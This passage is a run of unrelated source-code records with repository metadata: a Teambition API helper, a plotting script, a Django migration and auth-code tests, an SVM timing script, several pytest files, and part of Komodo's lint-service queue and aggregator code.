logFile.write(logContent)
print(logContent)
logFile.close()
def getOrgInfo(self):
res = requests.get(SETTINGS["URL_TB_GET_ORG_INFO"] + "?orgId="+ SETTINGS["TB_ORG_ID"],headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
# resJson = json.loads(res.content.decode("utf-8"))
def getTaskGroup(self,groupId):
res = requests.get(SETTINGS["URL_TB_GET_TASK_GROUP"] + "?projectId="+ groupId,headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def getTaskList(self,taskListId):
res = requests.get(SETTINGS["URL_TB_GET_TASK_LIST"] + "?tasklistId="+ taskListId,headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def getTasksByTql(self,tql):
res = requests.post(SETTINGS["URL_TB_GET_TASK_TQL"] ,json={"tql":tql},headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def main():
teambitionHelp = TeambitionHelp()
# groupList = teambitionHelp.getTaskGroup(SETTINGS["TB_PROJECT_ID_DEVELOP"])
# for group in groupList:
# print(group.get("name"))
# # print(group.get("tasklistIds"))
# for taskListId in group.get("tasklistIds"):
# print(teambitionHelp.getTaskList(taskListId))
tasks = teambitionHelp.getTasksByTql("projectId=" + SETTINGS["TB_PROJECT_ID_DEVELOP"] + " AND id = 5e78xxxxxxx7880 " )
for task in tasks:
print(task)
print("\n")
if __name__ == '__main__':
main()
|
[
"huangjiantao@qinsilk.com"
] |
huangjiantao@qinsilk.com
|
14af6f90daa0b86d6aa3eb173dd22c4267364a3e
|
500a32cfae24028417215a79146c04d8cd0f12a3
|
/Figures/FigureS4.py
|
05fbe12a5889a12b91b07fcc4905e52285789c73
|
[] |
no_license
|
daphnar/URA_paper
|
bd431296d97908483db2f5be2d472074fcd03fe7
|
c08eba53c63ef7a410797491c60dd6dd0975ad62
|
refs/heads/master
| 2021-07-31T20:13:47.490159
| 2021-07-27T21:27:06
| 2021-07-27T21:27:06
| 232,321,758
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,727
|
py
|
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import os
import matplotlib as mpl
#from Unicorn.Figures import nature_guidline_utils
from dark import cmap_map
from URA_paper.Figures import nature_guidline_utils
sns.set_style("ticks", {'axes.edgecolor': 'black'})
pd.set_option('display.width', 1000)
np.set_printoptions(precision=4, linewidth=200)
FIGURES_DIR = '/net/mraid08/export/jafar/Microbiome/Analyses/Unicorn/Cohort_Paper/revision_Analyses/figures'
params = {
'axes.labelsize': 10,
'font.size': 10,
'legend.fontsize': 10,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'figure.dpi': 300,
'axes.linewidth': 0.5,
}
fontsize = 10
plt.rcParams.update(params)
fig = plt.figure(figsize=(nature_guidline_utils.two_columns(),
nature_guidline_utils.full_page()*0.8*0.2), dpi=300) # m2inch(165)
import matplotlib.gridspec as gridspec
green=(47./255,142./255,52./255)
violet = (106./255,111./255,205./255)
two_colors = [violet,green]#colors_rgb[-2:]
axdrest_grid_bottom = gridspec.GridSpec(1,3,wspace=0.7,width_ratios=[1./3,1./3,1./3])
ax__age_saturation = plt.subplot(axdrest_grid_bottom[0,0])
ax__hba1c_saturation = plt.subplot(axdrest_grid_bottom[0,1])
ax__bmi_saturation = plt.subplot(axdrest_grid_bottom[0,2])
plt.sca(ax__age_saturation)
plt.text(-.53, 1.15, 'a', ha='center', va='center', transform=ax__age_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - age_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__age_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__age_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__age_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__age_saturation.yaxis.set_ticks_position('left')
ax__age_saturation.xaxis.set_ticks_position('bottom')
ax__age_saturation.spines['right'].set_visible(False)
ax__age_saturation.spines['top'].set_visible(False)
ax__age_saturation.set_xlim([0,20000])
ax__age_saturation.set_xticks([0,10000,20000])
plt.ylim(0,20)
ax__age_saturation.set_yticks([0,10,20])
plt.xlabel('Sample size')
plt.ylabel('age $R^{2}$ (%)')
plt.legend(['GBDT','Ridge'],bbox_to_anchor=(1.15, 0.0),frameon=False,loc=4)
plt.sca(ax__hba1c_saturation)
plt.text(-0.2, 1.15, 'b', ha='center', va='center', transform=ax__hba1c_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - hba1c_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__hba1c_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__hba1c_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__hba1c_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__hba1c_saturation.yaxis.set_ticks_position('left')
ax__hba1c_saturation.xaxis.set_ticks_position('bottom')
ax__hba1c_saturation.spines['right'].set_visible(False)
ax__hba1c_saturation.spines['top'].set_visible(False)
ax__hba1c_saturation.set_xlim([0,16000])
ax__hba1c_saturation.set_xticks([0,7500,15000])
plt.ylim(0,10)
ax__hba1c_saturation.set_yticks([0,5,10])#,20])
plt.xlabel('Sample size')
plt.ylabel('HbA1C% $R^{2}$ (%)')
plt.sca(ax__bmi_saturation)
plt.text(-.25, 1.15, 'c', ha='center', va='center', transform=ax__bmi_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - bmi_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__bmi_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__bmi_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__bmi_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__bmi_saturation.yaxis.set_ticks_position('left')
ax__bmi_saturation.xaxis.set_ticks_position('bottom')
ax__bmi_saturation.spines['right'].set_visible(False)
ax__bmi_saturation.spines['top'].set_visible(False)
ax__bmi_saturation.set_xlim([0,20000])
ax__bmi_saturation.set_xticks([0,10000,20000])
ax__bmi_saturation.set_yticks([0,5,10,15])
plt.xlabel('Sample size')
# plt.ylabel('')
plt.ylabel('BMI $R^{2}$ (%)')
plt.ylim(0,15)
plt.savefig(os.path.join(FIGURES_DIR, 'figureS_4.pdf'), bbox_inches='tight', format='pdf')
plt.savefig(os.path.join(FIGURES_DIR, 'figureS_4.png'), bbox_inches='tight', format='png')
|
[
"aaaa85Al"
] |
aaaa85Al
|
7df75a268c13f4de545db13ec51df02cd9cdbda5
|
ddcc89dc88961f37d50c0f9d893f265bf34afdb3
|
/test/test_simple_module_pass.py
|
f6be33ae365cbfb62819b6d08a8740fcd1ff5120
|
[
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"NCSA",
"LicenseRef-scancode-public-domain"
] |
permissive
|
mulle-nat/property-syntax-modernizer
|
f351319314a0216e5e241fa03f9d95a3764a6590
|
93445534221840d0df6cfb2d2f4ceb73f37ac962
|
refs/heads/master
| 2020-08-07T08:57:02.149734
| 2019-10-07T12:46:11
| 2019-10-07T12:46:11
| 213,381,270
| 0
| 0
|
Unlicense
| 2019-10-07T13:11:51
| 2019-10-07T12:47:05
|
C++
|
UTF-8
|
Python
| false
| false
| 442
|
py
|
import sys, unittest
from tools import SamplesTestCase
OUTPUT_FOR_GLOBALS = '''\
Found global named "gfloat": type = float*
Found global named "gppfloat": type = float***
Found global named "gint": type = i32*
'''
PROG = 'simple_module_pass'
class TestSimpleModulePass(SamplesTestCase):
def test_on_globals(self):
self.assertSampleOutput([PROG], 'globals.ll', OUTPUT_FOR_GLOBALS)
if __name__ == '__main__':
unittest.main()
|
[
"eliben@gmail.com"
] |
eliben@gmail.com
|
244651275300889c2f7a9b4928af9c1940ad6614
|
4be9a5bdb8e051001b78c8f127ccc1a7f85c14e7
|
/bugzilla/migrations/0002_auto_20170205_1515.py
|
6b518a7b30a1bea8b1cda0d937046f6fe0febbe5
|
[] |
no_license
|
quentin-david/heimdall
|
f72a85606e7ab53683df2023ef5eaba762198211
|
84a429ee52e1891bc2ee4eb07a084dff209c789c
|
refs/heads/master
| 2021-01-21T10:26:28.895663
| 2017-07-21T19:19:46
| 2017-07-21T19:19:46
| 83,432,596
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-05 15:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bugzilla', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bugzilla',
options={'ordering': ['-date_update']},
),
migrations.AlterField(
model_name='bugzilla',
name='state',
field=models.CharField(choices=[('open', 'Open'), ('close', 'Close'), ('info', 'Info')], max_length=15),
),
]
|
[
"david@hemdgsa01.local.lan"
] |
david@hemdgsa01.local.lan
|
848b91f09b40a31a3b9e5798f08cb9dc68841a53
|
bd8b3d43a465b26f0d86a3007b41d6a3c22345a6
|
/svsutils/iterators/__init__.py
|
6bde41920adb8b8446e1ce7254e5cba9a485b1fe
|
[] |
no_license
|
nathanin/svsutils
|
aed5d361ff4716390e093d6bab6bf3cc6dd69a9b
|
5789c3e589ce9244b21a24d6cdc3909bc4e04517
|
refs/heads/master
| 2020-06-25T06:06:37.019860
| 2019-12-17T05:08:35
| 2019-12-17T05:08:35
| 199,225,548
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 122
|
py
|
from .iterator_factory import PythonIterator, TensorflowIterator
__all__ = [
'PythonIterator',
'TensorflowIterator'
]
|
[
"ing.nathany@gmail.com"
] |
ing.nathany@gmail.com
|
0187aa1b8fa9854b1f253d952bda031992f4b423
|
20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7
|
/old/pddbm/bug3.py
|
7d0a81d444b74c37e2e621dc7a08f50608b54c18
|
[] |
no_license
|
sarahboufelja54/galatea
|
f5664f0b3117629b2c5bbe078a1bd52bb5e359e6
|
002a9f2905868be25b71770190fb2d5eda11c861
|
refs/heads/master
| 2020-12-04T13:45:07.697189
| 2018-12-12T16:27:09
| 2018-12-12T16:27:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
import numpy as np
from sklearn.svm import SVC
import time
rng = np.random.RandomState([1,2,3])
m = 1000
n = 1000
X = rng.randn(m,n)
w = rng.randn(n)
b = rng.randn(1)
y = (np.dot(X,w) + b ) > 0
t1 = time.time()
svm = SVC(kernel = 'linear', C = 1.0).fit(X,y)
t2 = time.time()
print 'train time ',t2 - t1
t1 = time.time()
y1 = svm.predict(X)
t2 = time.time()
print 'predict time ',t2 - t1
print '# support vectors:',svm.n_support_
print 'predict time per support vector:',(t2-t1)/float(svm.n_support_.sum())
coef = svm.coef_[0,:]
orig_coef = svm.coef_
t1 = time.time()
f = - np.dot(X, orig_coef.T) + svm.intercept_
y2 = f < 0
print y.shape
print y2.shape
print (y2 == y).shape
quit(-1)
t2 = time.time()
print 'dot product time',t2 -t1
print 'class 1 prevalence ',y.mean()
print 'predict accuracy ',(y1 == y).mean()
print 'dot product accuracy ',(y2 == y).mean()
print 'predict and dot agreement rate',(y1 == y2).mean()
coefs = svm.dual_coef_
assert len(coefs.shape) == 2
assert coefs.shape[0] == 1
coefs = coefs[0,:]
w = np.dot(svm.support_vectors_.T, coefs)
assert np.allclose(w,-coef)
f = np.dot(X,w) + b
y3 = (f < 0)
print 'agreement rate with my method: ',(y3 == y1).mean()
print 'dot prod between sklearn coef_ and my coef_: ',np.dot(w,svm.coef_[0,:])
|
[
"goodfellow.ian@gmail.com"
] |
goodfellow.ian@gmail.com
|
7b0c4083d029a92441704bd296c1aef0ebbf84f2
|
2d4ab8e3ea9fd613ec0ae0c1956b68874c9b5f06
|
/tests/pipelines/cnv_calling/test_xhmm_pca.py
|
e9dc13feb4ca41c6220481e9e7105e1e72bce443
|
[] |
no_license
|
biocodices/paip
|
4abd39cbbd372a68592da87177c70c403d5a661d
|
040a62c11e5bae306e2de4cc3e0a78772ee580b3
|
refs/heads/master
| 2021-01-17T20:48:28.642255
| 2019-07-26T14:30:58
| 2019-07-26T14:30:58
| 62,604,413
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,013
|
py
|
from unittest.mock import MagicMock
import pytest
from paip.pipelines.cnv_calling.xhmm_pca import XhmmPCA, EmptyInputMatrix
@pytest.fixture
def task(cohort_task_factory):
return cohort_task_factory(XhmmPCA)
def test_check_matrix(task):
# NOTE: Run this test before the next one, because the tested method
# check_matrix() will be mocked in test_run().
empty_matrix = pytest.helpers.file('empty_matrix.txt')
with pytest.raises(EmptyInputMatrix):
task.check_matrix(empty_matrix)
def test_run(task, mock_rename):
check_matrix = MagicMock()
task.check_matrix = check_matrix
task.run()
check_matrix.assert_called_once()
(command, ), kwargs = task.run_command.call_args
assert 'xhmm --PCA' in command
assert 'DATA.filtered_centered.RD.txt' in command
assert 'DATA-temp.RD_PCA' in command
assert mock_rename.call_count == 3
assert 'DATA-temp.RD_PCA' in mock_rename.call_args[0][0]
assert 'DATA.RD_PCA' in mock_rename.call_args[0][1]
|
[
"juanmaberros@gmail.com"
] |
juanmaberros@gmail.com
|
ec2f894e96dc3e63e0a4c74c3de67eab7985c8bc
|
c713ba772c663849b2339ea13f3a6e407058bfc7
|
/auth/tests.py
|
796d49f3d5c9abb762a26263a4e564faf0e0c7bd
|
[
"MIT"
] |
permissive
|
aprosvetova/vas3k.club
|
3aaf31cec36a3283336e6da391766632091c1fcc
|
e667b91bb855a256bcb7760fb1555ebbb1079744
|
refs/heads/master
| 2022-12-22T16:08:27.487072
| 2020-09-14T21:59:44
| 2020-09-14T21:59:44
| 297,010,352
| 2
| 0
|
MIT
| 2020-09-20T05:43:25
| 2020-09-20T05:43:24
| null |
UTF-8
|
Python
| false
| false
| 5,452
|
py
|
from datetime import datetime, timedelta
import django
from django.conf import settings
from django.test import TestCase
django.setup() # todo: how to run tests from PyCharm without this workaround?
from auth.models import Code
from club.exceptions import RateLimitException, InvalidCode
from users.models.user import User
class ModelCodeTests(TestCase):
@classmethod
def setUpTestData(cls):
# Set up data for the whole TestCase
cls.new_user: User = User.objects.create(
email="testemail@xx.com",
membership_started_at=datetime.now() - timedelta(days=5),
membership_expires_at=datetime.now() + timedelta(days=5),
)
def test_create_code_positive(self):
recipient = "success@a.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
self.assertEqual(code.recipient, recipient)
self.assertEqual(self.new_user.id, code.user_id)
self.assertEqual(len(code.code), settings.AUTH_CODE_LENGTH)
self.assertAlmostEqual(code.expires_at.second, (datetime.utcnow() + timedelta(minutes=15)).second, delta=5)
def test_create_code_ratelimit(self):
recipient = "ratelimit@a.com"
# override the AUTH_MAX_CODE_TIMEDELTA setting
with self.settings(AUTH_MAX_CODE_COUNT=1):
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
self.assertEqual(len(code.code), settings.AUTH_CODE_LENGTH)
# second attempt should rise exception
with self.assertRaises(RateLimitException):
Code.create_for_user(user=self.new_user, recipient=recipient)
def test_create_code_reset_ratelimit(self):
recipient = "ratelimit@a.com"
with self.settings(AUTH_MAX_CODE_COUNT=1):
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
self.assertEqual(len(code.code), settings.AUTH_CODE_LENGTH)
# move creation time to deep enough past
code.created_at = datetime.utcnow() - settings.AUTH_MAX_CODE_TIMEDELTA - timedelta(seconds=1)
code.save()
# no exception raises
code = Code.create_for_user(user=self.new_user, recipient=recipient)
self.assertEqual(len(code.code), settings.AUTH_CODE_LENGTH)
def test_check_code_positive(self):
recipient = "success@a.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
user = Code.check_code(recipient=recipient, code=code.code)
self.assertEqual(user.id, self.new_user.id)
def test_check_code_which_is_incorrect(self):
with self.assertRaises(InvalidCode):
Code.check_code(recipient="failed@xxx.com", code="failed")
def test_check_code_twice(self):
recipient = "success@a.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
Code.check_code(recipient=recipient, code=code.code) # activate first time
with self.assertRaises(InvalidCode):
Code.check_code(recipient=recipient, code=code.code)
def test_check_code_which_is_not_last_one(self):
# issue few codes
recipient = "fewcodes@a.com"
code1: Code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
code2: Code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
# for stability test runs
code2.created_at -= timedelta(seconds=1)
code2.save()
with self.assertRaises(InvalidCode):
Code.check_code(recipient=recipient, code=code2.code)
# first one is successful
user = Code.check_code(recipient=recipient, code=code1.code)
self.assertEqual(user.id, self.new_user.id)
def test_check_code_which_is_for_other_user(self):
recipient_right = "true-user@a.com"
recipient_wrong = "wrong-user@x.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient_right, length=settings.AUTH_CODE_LENGTH)
with self.assertRaises(InvalidCode):
Code.check_code(recipient=recipient_wrong, code=code.code)
def test_check_code_when_exceeded_attempts_count(self):
recipient = "exceeded_attemts@a.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
# override the AUTH_MAX_CODE_TIMEDELTA setting
with self.settings(AUTH_MAX_CODE_ATTEMPTS=1):
# first attempt
with self.assertRaises(InvalidCode):
Code.check_code(recipient=recipient, code="wrong_attempt")
# second attempt should rise ratelimit exception
with self.assertRaises(RateLimitException):
Code.check_code(recipient=recipient, code=code.code)
def test_check_code_which_is_expired(self):
recipient = "expired@a.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
code.expires_at = datetime.utcnow() - timedelta(seconds=1)
code.save()
with self.assertRaises(InvalidCode):
Code.check_code(recipient=recipient, code=code.code)
|
[
"noreply@github.com"
] |
aprosvetova.noreply@github.com
|
2eeceb42de2ea27fde10e7e6d5c08914488ee6c5
|
b4da2201d2df789e28472aeded28720d5269ade5
|
/Komodo-Edit-7/lib/mozilla/components/koLintService.py
|
4e543d65bce81928a8d67a2192aeee69c031327d
|
[] |
no_license
|
AeonSaber/first_app
|
5ad89d4fb05d7662e2a39ce68176f43f1e618bf0
|
522fdfa6d33419fd49e431766fff85b40d21e78e
|
refs/heads/master
| 2020-06-12T17:22:09.786142
| 2013-09-09T23:57:51
| 2013-09-09T23:57:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 30,788
|
py
|
#!python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
# ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
import os, sys
import threading
import time
import urllib2
from xpcom import components, nsError, ServerException, COMException
from xpcom._xpcom import PROXY_SYNC, PROXY_ALWAYS, PROXY_ASYNC, getProxyForObject
from xpcom.server import WrapObject, UnwrapObject
from koLintResult import KoLintResult, getProxiedEffectivePrefs
from koLintResults import koLintResults
import logging
log = logging.getLogger("koLintService")
#log.setLevel(logging.DEBUG)
class RequestQueue:
    """Blocking FIFO queue of lint requests.

    This is a modification of Python's std Queue.Queue class:
    - drop maxsize related stuff
    - calls are always blocking
    - add .prepend() and .remove_uid()

    Locking protocol: `mutex` guards the underlying list; `esema` is held
    (acquired) exactly while the queue is empty, so .get() blocks on it
    until a producer releases it.
    """
    def __init__(self):
        import thread
        self._init()
        self.mutex = thread.allocate_lock()
        self.esema = thread.allocate_lock() # if acquired, then queue is empty
        self.esema.acquire()
    def put(self, item):
        """Put an item into the queue."""
        log.debug("in RequestQueue.put, acquiring mutex")
        self.mutex.acquire()
        log.debug("in RequestQueue.put, acquired mutex")
        try:
            was_empty = self._empty()
            self._append(item)
            # If we fail before here, the empty state has
            # not changed, so we can skip the release of esema
            if was_empty:
                log.debug("in RequestQueue.put, releasing esema")
                self.esema.release()
        finally:
            # Catching system level exceptions here (RecursionDepth,
            # OutOfMemory, etc) - so do as little as possible in terms
            # of Python calls.
            log.debug("in RequestQueue.put, releasing mutex")
            self.mutex.release()
    def prepend(self, item):
        """Prepend an item to the queue (it becomes the next one fetched)."""
        log.debug("in RequestQueue.prepend, acquiring mutex")
        self.mutex.acquire()
        log.debug("in RequestQueue.prepend, acquired mutex")
        try:
            was_empty = self._empty()
            self._prepend(item)
            # If we fail before here, the empty state has
            # not changed, so we can skip the release of esema
            if was_empty:
                log.debug("in RequestQueue.prepend, releasing esema")
                self.esema.release()
        finally:
            # Keep this finally block minimal: it must run even for
            # system-level exceptions (RecursionDepth, OutOfMemory, etc).
            log.debug("in RequestQueue.prepend, releasing mutex")
            self.mutex.release()
    def get(self):
        """Remove and return an item from the queue.
        Block if necessary until an item is available.
        """
        log.debug("in RequestQueue.get, acquiring esema")
        self.esema.acquire()
        log.debug("in RequestQueue.get, acquired esema")
        log.debug("in RequestQueue.get, acquiring mutex")
        self.mutex.acquire()
        log.debug("in RequestQueue.get, acquired mutex")
        release_esema = 1
        try:
            item = self._get()
            # Failure means empty state also unchanged - release_esema
            # remains true.
            release_esema = not self._empty()
        finally:
            if release_esema:
                log.debug("in RequestQueue.get, releasing esema")
                self.esema.release()
            log.debug("in RequestQueue.get, releasing mutex")
            self.mutex.release()
        return item
    def remove_uid(self, uid):
        """Remove all current requests with the given uid.
        Does not return anything.
        """
        log.debug("in RequestQueue.remove_uid, acquiring esema")
        if not self.esema.acquire(0): # do not block to acquire lock
            # return if could not acquire: means queue is empty and
            # therefore do not have any items to remove
            log.debug("in RequestQueue.remove_uid, did not acquire esema")
            return
        # BUG FIX: this message used to read "acquired mutex", but at this
        # point only the *esema* has been acquired; the mutex follows below.
        log.debug("in RequestQueue.remove_uid, acquired esema")
        log.debug("in RequestQueue.remove_uid, acquiring mutex")
        self.mutex.acquire()
        release_esema = 1
        try:
            self._remove_uid(uid)
            # Failure means empty state also unchanged - release_esema
            # remains true.
            release_esema = not self._empty()
        finally:
            if release_esema:
                log.debug("in RequestQueue.remove_uid, releasing esema")
                self.esema.release()
            log.debug("in RequestQueue.remove_uid, releasing mutex")
            self.mutex.release()
    #---- Override these methods to implement other queue organizations
    # (e.g. stack or priority queue). These will only be called with
    # appropriate locks held.
    # Initialize the queue representation
    def _init(self):
        self.queue = []
    # Check whether the queue is empty
    def _empty(self):
        return not self.queue
    # Put a new item in the queue
    def _append(self, item):
        self.queue.append(item)
    def _prepend(self, item):
        self.queue.insert(0, item)
    # Get an item from the queue
    def _get(self):
        item = self.queue[0]
        del self.queue[0]
        return item
    # Remove all requests with the given uid.
    def _remove_uid(self, uid):
        self.queue = [item for item in self.queue
                      if hasattr(item, "uid") and item.uid != uid]
class _GenericAggregator(object):
    """Aggregate linter: runs every terminal linter registered for a
    language and merges their results into a single koLintResults.
    """
    _com_interfaces_ = [components.interfaces.koILinter]
    _reg_desc_ = "Komodo Generic Aggregate Linter"
    _reg_clsid_ = "{b68f4ff8-f37e-45d1-970e-88b964e7096d}"
    _reg_contractid_ = "@activestate.com/koGenericLinterAggregator;1"
    def initialize(self, languageName, koLintService):
        """Remember the language to aggregate for and the owning service."""
        self._languageName = languageName
        self._koLintService = koLintService
    def lint(self, request):
        """Encode the request buffer and delegate to lint_with_text."""
        encoded = request.content.encode(request.encoding.python_encoding_name)
        return self.lint_with_text(request, encoded)
    def lint_with_text(self, request, text):
        """Run each terminal linter; merge any non-empty result sets."""
        merged = koLintResults()
        linters = self._koLintService.getTerminalLintersForLanguage(self._languageName)
        for linter in linters:
            try:
                found = UnwrapObject(linter).lint_with_text(request, text)
            except:
                log.exception("lint_with_text exception")
                continue
            if found and found.getNumResults():
                if merged.getNumResults():
                    merged = merged.addResults(found)
                else:
                    merged = found
        return merged
class KoLintRequest:
    """One queued lint job: which document/linter to run and, after the
    worker thread finishes, the results or an error string.
    """
    _com_interfaces_ = [components.interfaces.koILintRequest]
    _reg_desc_ = "Komodo Lint Request"
    _reg_clsid_ = "{845A872F-293F-4a82-8552-40849A92EC80}"
    _reg_contractid_ = "@activestate.com/koLintRequest;1"
    def __init__(self):
        # rid/uid identify the request and the requesting buffer; content,
        # encoding and linter are filled in by KoLintService.addRequest();
        # results/errorString are set by the worker thread.
        self.rid = None
        self._koDoc = None
        self.uid = ''
        self.linterType = ''
        self.cwd = ''
        self.content = None
        self.encoding = None
        self.linter = None
        self.results = None
        self.errorString = ''
    @property
    def document(self):
        """Deprecated alias for `koDoc` (kept for old callers)."""
        import warnings
        warnings.warn("`koILintRequest.document` was DEPRECATED in Komodo "
                      "6.0.0b1, use `koILintRequest.koDoc`.",
                      DeprecationWarning)
        return self.koDoc
    @property
    def koDoc(self):
        return self._koDoc
    def get_koDoc(self):
        return self._koDoc
    def set_koDoc(self, val):
        # Access to the koDoc *must* be from the main thread, otherwise
        # Komodo may crash!
        self._koDoc = getProxyForObject(1,
            components.interfaces.koIDocument, val,
            PROXY_ALWAYS | PROXY_SYNC)
    def describe(self):
        """Return a short human-readable identification for logging."""
        return "<KoLintRequest: %s on uid %s>" % (self.linterType, self.uid)
class KoLintService:
_com_interfaces_ = [components.interfaces.koILintService,
components.interfaces.nsIObserver]
_reg_desc_ = "Komodo Lint Management Service"
_reg_clsid_ = "{9FD67601-CB60-411D-A212-ED21B3D25C15}"
_reg_contractid_ = "@activestate.com/koLintService;1"
def __init__(self):
log.info("KoLintService.__init__()")
self._linterCache = {} # mapping of linterCID to koILinter instance
self.requests = RequestQueue() # an item of None is the quit sentinel
self._shuttingDown = 0
self.manager = threading.Thread(target=self.run, name="Linter")
self.manager.setDaemon(True)
self.manager.start()
self._wrapped = WrapObject(self, components.interfaces.nsIObserver)
_observerSvc = components.classes["@mozilla.org/observer-service;1"].\
getService(components.interfaces.nsIObserverService)
_observerSvc.addObserver(self._wrapped, 'xpcom-shutdown', 1)
self._prefs = components.classes["@activestate.com/koPrefService;1"].\
getService(components.interfaces.koIPrefService).prefs
# dict of { 'terminals' => array of linters, 'aggregators' => array of linters }
self._linterCIDsByLanguageName = {}
# Init it now, pay the price of walking through the categories now...
catman = components.classes["@mozilla.org/categorymanager;1"].\
getService(components.interfaces.nsICategoryManager)
categoryName = 'category-komodo-linter-aggregator'
names = catman.enumerateCategory(categoryName)
while names.hasMoreElements():
nameObj = names.getNext()
rawName, fixedName = self._getCategoryNameFromNameObj(nameObj)
cid = catman.getCategoryEntry(categoryName, rawName)
if not self._linterCIDsByLanguageName.has_key(fixedName):
self._linterCIDsByLanguageName[fixedName] = {'terminals':[],
'aggregator':cid}
else:
log.warn("Possible Problem: more than one entry for linter aggregator %s (was %s), now %s",
name,
self._linterCIDsByLanguageName[fixedName]['aggregator'],
cid)
self._linterCIDsByLanguageName[fixedName]['aggregator'] = cid
categoryName = 'category-komodo-linter'
names = catman.enumerateCategory(categoryName)
while names.hasMoreElements():
nameObj = names.getNext()
rawName, fixedName = self._getCategoryNameFromNameObj(nameObj)
idx = fixedName.find("&type=")
if idx == -1:
languageName = fixedName
else:
languageName = fixedName[:idx]
